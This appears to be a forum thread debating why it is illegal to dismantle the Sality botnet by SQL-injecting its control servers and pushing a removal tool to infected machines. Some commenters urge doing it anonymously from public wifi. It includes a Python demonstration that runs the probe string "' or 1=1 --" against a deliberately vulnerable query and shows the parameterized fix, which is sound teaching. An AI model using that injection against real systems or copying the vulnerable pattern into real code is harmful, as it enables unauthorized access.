I remember a case from some years back when some group (some AV group or something like that) took control over a major botnet by taking control over the domains the botnet would use in future for receiving updates/commands. The algorithm was pretty sophisticated as it generated dozens of new domains each day and was trying to contact them at random. E.g. generate 100 domains, try to contact 15 of them, if none responds wait a day. Statistically the bot would get its commands in 2-3 days (I don't really remember exact numbers so this example might not add up). Well, in order to stop the botnet you'd need to register all available domains out of those 100. So, they were doing just that for some time. They practically blocked the owners operating the botnet. But they couldn't destroy it. Because that would require manipulating data on random people's computers without their consent, which you simply can't (legally). And I think it should stay that way. So anyway, they left it be and the owners took control back.

But what can be done? You have to keep your operating system updated. Having AV software (which is quicker in updates and acts as prevention) doesn't hurt either. And as this is not a real option for some time, this is a good way. You destroy it in illegal fashion. But no official organization can do that.


Is just changing the source code for the next update on the servers a privacy violation? Every zombie machine will download it by itself.


They simply can't. This is very different from closing down some "piracy" sites

Yes, they're called lobbyists. And no large brown bags stuffed with $100 bills have been passed under the table. There is also no oil there.


Dutch police infiltrated a botnet recently, and left a message for victims. No one was too happy with them and they weren't really allowed to...


Because the actions required to do so are illegal. This isn't about replacing sites or controlling the C&C machines. That's relatively easy.

To 'take down' the bots in the fashion of the OP means you upload the AVG removal tool so that the bots grab it at some point in their update cycle and run it.

What you've done here is arrange to run code on the infected machines that the owner of the machine is unaware of. Code that is intended to alter software on that machine, and that is illegal in exactly the same way as infecting the machine with the bot virus in the first place.

As the machines are, in the main, unidentified and spread all over the world, no one legal entity (FBI, SOCA, Interpol etc.) covers them all within their jurisdiction, or can target only the machines within it, so applicable warrants and permissions would be practically impossible to obtain.


Because it is against the law. Taking down a site used by a criminal (or someone they believe is criminal) is within their purview. Making unauthorized changes to the computers of an innocent 3rd party (even minor changes, like removing a botnet infection) is against the law.


Does anyone know exactly why it's illegal to take down Sality?


Messing with other people's computers in any form without their information and consent is usually prohibited by law.

A slightly broken analogy would be breaking into a house to remove a hornets' nest. Even if you do it carefully and don't do any damage and what you do is beneficial for the community as a whole, it's contrary to the law.


If my neighbour's hornets' nest had killer hornets that were biting all the children in the neighbourhood and the police / council refused to do anything, then it'd be a damned shame if someone neatly removed the hornets' nest.

Of course that wouldn't make it any more legal; but your defence would have a field day with the prosecution I'd imagine.

IANAL but I've watched the first double episode of The Firm, and I reckon I've got a pretty good grasp on how the law works now!


I'm curious now. What if my neighbour's house was on fire? That fire threatens the whole neighbourhood. Surely I can protect my property by attempting to put out the fire. Do firefighters have indemnity for attempting to put out fires? What about volunteer firefighters?

Obviously I consider a house on fire to be analogous to an infected computer, but I do have some protection putting out a fire, right? Nobody would sue me for fire damage (as long as I'm reasonable etc.).


With a house on fire you're taking reasonable action to protect life.

In general, when you do something you then take responsibility for the consequences of that action. Thus, if there was a tiny fire and you flooded the house with water and foam and caused considerable water damage you may find the home owner suing for damage caused. You could counter by saying you prevented much more damage, but they'd say that a competent fire-fighter would have done that and avoided all the water damage.

The analogy fails (as they always do) because there are specific criminal laws around computer misuse / unauthorised use. Running software on someone's machine without their permission is unlawful.

You may have mitigation if you can claim that the harm from the botnet was more severe than the harm caused by the clean-up-hacking.

It is frustrating. I used to say "Don't fight abuse with abuse", but it's pretty hard to keep that attitude in the face of so much malware and spam.


Pointing a water hose at someone else's house is probably illegal too... unless the house is on fire. Then it's OK... see?


"A slightly broken analogy would be breaking into a house to remove a hornets nest. Even if you do it carefully and not do any damage and what you do is beneficial for the community as a whole, it's contrary to the law."

On the other hand, you can't give a choking person the Heimlich maneuver, or perform CPR on someone, without physical contact that could be construed as assault (or battery? not sure) in any other context.


But what if I genuinely wanted to see if I had registered a user by the name of "' or 1=1 --"? Oh well, hopefully someone else did it too, since it was posted here.

"Messing with" is very subjective.


The "takedown" technique presented works by exploiting the botnet's functionality to have all the machines remove themselves from the botnet - actually carrying out the removal requires you to hack into at least one third-party server, and it would probably count as gaining unauthorized access to each of the machines in the botnet as well.


Is that network yours? No? Then it's illegal.

It's an interesting way to have someone do the dirty work. I would love to see a postmortem writeup.


Is "breaking into" a shanty town built on my neighbourhood's various front lawns illegal?


In many countries, yes.


It's illegal in a similar manner to robbing a drug cartel--getting arrested is probably the least of your concerns. No one will step forward to law enforcement over it, but organized crime has their own law enforcement.


Sounds like the author figured out a SQL injection vulnerability in the website the bot downloads logos from, and a way to give the removal tool as the image in a way that infects Sality itself. This would distribute the removal tool very quickly. The hacking of the website seems to be the legal issue here.


While yes this is technically illegal, honest question does the letter of the law stand in a situation where those "wronged" by the infraction are themselves in the wrong? From a legal standpoint, charges would have to be brought against you by someone, and I doubt that anyone who sustained damage from this situation (the bot network's owner) would have the ability to demonstrate such a thing without substantially incriminating themselves.

From a purely philosophical standpoint, you could take a utilitarian approach à la J.S. Mill and say that it would do the greatest quantity of good to the greatest number of people to take such action. Granted, at the point we're discussing philosophy, we're outside the judicial process, which is all that's up for debate here.


'where those wronged by the infraction are themselves in the wrong' - it is certainly possible for this to be a crime, consider killing a burglar.


Presumably because it involves exploiting a SQL injection attack on one or more control servers, and then using the control servers to install software on thousands of other people's computers without their knowledge or consent.


Because technically the methods used (i.e. SQL injection) are illegal if you don't own the equipment you're using it on. Also he is a civilian and does not have any power or jurisdiction to do so.


Slightly off-topic: Is SQL injection itself illegal? Because I was under the impression that only using SQL injection to gain unauthorized access to someone else's computer (like the OP is suggesting) was illegal.


You can do SQLi against your own database 24x7 and you'd be just fine in the eyes of the law.
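To make concrete what the SQL injection discussed in this thread is, here is the `' or 1=1 --` input joked about above run against a throwaway in-memory SQLite database, once through a lookup that concatenates the input into the statement and once through the same lookup with a bound parameter. This is an added example, not code from the seclists post or from anyone in this thread; the `users` table, its rows and the function names are constructed for illustration.

```python
import sqlite3

# Constructed sample data: a small "users" table for an in-memory SQLite database.
SAMPLE_USERS = [("alice", "admin"), ("bob", "user"), ("carol", "user")]


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_query_vulnerable(name):
    """Build the SQL text by string concatenation: the input becomes part of the statement."""
    return f"SELECT name FROM users WHERE name = '{name}'"


def find_user_vulnerable(conn, name):
    """Lookup that trusts the caller's string; a quote in the input is parsed as SQL."""
    return [row[0] for row in conn.execute(build_query_vulnerable(name))]


def find_user_safe(conn, name):
    """Same lookup with a bound parameter: the input is only ever a value, never SQL."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


def demo():
    """Run both lookups with a normal name and with the probe string from the thread."""
    conn = make_db()
    probe = "' or 1=1 --"  # closes the quoted literal, adds a true clause, comments out the rest
    return {
        "vulnerable_bob": find_user_vulnerable(conn, "bob"),
        "vulnerable_probe": find_user_vulnerable(conn, probe),  # every row comes back
        "safe_bob": find_user_safe(conn, "bob"),
        "safe_probe": find_user_safe(conn, probe),  # no user has that literal name: []
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable path turns the statement into `SELECT name FROM users WHERE name = '' or 1=1 --'`, so the `WHERE` clause is always true and the trailing quote is commented away; the parameterized path never reparses the input, so the same string simply matches nothing. The fix is the same on any server that builds queries from request data: bind values, never splice them into SQL text.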


The C&C servers are sites hacked by the owners of the botnet. You would have to hack them yourself and upload your own payload to take down peers.


What if one of the site owners 'fixed' their server? That'd be nice and legal, wouldn't it?


Is it just me or did the OP just blow a rare opportunity to be a hero? The power of a zero-day exploit is that you don't announce it and give the target a chance to make a patch.


So he should've contacted the botnet owner and told him to patch the sites he uses for controlling the botnet?


That's exactly what he did by announcing this publicly instead of just going to a public wifi and quietly taking down the botnet.


Looks like the OP is doing a hack - he is trying to achieve his goal [of destroying parts of the botnet] by hacking legal system, since he can not do this on his own...

Resourceful!


Does anyone know if the actions described in the article have been carried out? I'd hate to think that the "current owners" of the Sality botnet have fixed this exploit.


What if I get permission from the owner of one of the infected systems to "penetrate" his setup and upload the botnet-destroyer. Would that still be illegal?


I think the issue is that to remove the botnet, it requires having your code be executed on all infected machines. You can't possibly get permission from the owners of the millions of infected machines to do this.


Yep. Imagine if it bugged out and broke all the infected machines. Even if the bug that broke the machines wasn't his fault, he'd probably still be in a grey area.


Even a bug that affects just 0.1% of a 1-million-machine botnet would still leave 1000 unhappy users with broken setups who might consider themselves to have been better off with the botnet.


I'm kind of confused why one would publish the HOWTO-kill anonymously. It would be totally reasonable to publish the howto and "wouldn't it be horrible if this happened; don't do it" under your name (if you want fame, without legal liability). Or, just publish and do it all anonymously. I guess I'm motivated by either fame or kills, which might be different than the anonymous party here.

I guess even publishing legally-protected information doesn't protect you from the nuisance of civil lawsuits, or potential extralegal/illegal actions by either the botnet staff or anyone who is harmed by the botnet or removal of botnet.


Why are you assuming that lawabidingcitizen is not a disgruntled member of the organization behind Sality?


My lack of creativity or deep thinking on this issue (deadened by 8h of accounting catch-up tonight). That sounds like a highly plausible scenario.


Guys, the reason that the author didn't use these tools himself is because /they will kill you if you mess with their stuff/.

That's what global crime syndicates do.


You should NOT take over the botnet and harden it.


Would this be completely prevented if the botnet owners signed (with a private key) their payloads?


Yes, I believe that would be very effective.


According to the wiki this botnet already had this feature, but this bug apparently exploits something else.


Please OP, you obviously have done the work, just go to a library or any free wifi location and run the damn thing.


So, is it down yet?


You're not actually a law abiding citizen if you just publicly recruited for people to join your felony conspiracy.
